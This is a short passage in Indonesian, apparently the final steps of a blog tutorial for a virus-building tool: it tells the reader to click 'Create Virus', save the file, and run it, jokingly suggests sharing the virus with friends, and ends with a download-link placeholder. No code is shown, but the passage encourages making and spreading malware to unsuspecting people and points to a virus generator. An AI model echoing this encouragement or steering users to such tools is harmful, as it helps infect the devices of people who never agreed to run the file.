- Terakhir anda klik Create Virus dan simpan ke direktori anda.
- File virus siap dijalankan. (*dan bagi-bagi ke teman-teman anda, �hahahah�hanya saran�*)
Download Link �> DOWNLOAD DISINI













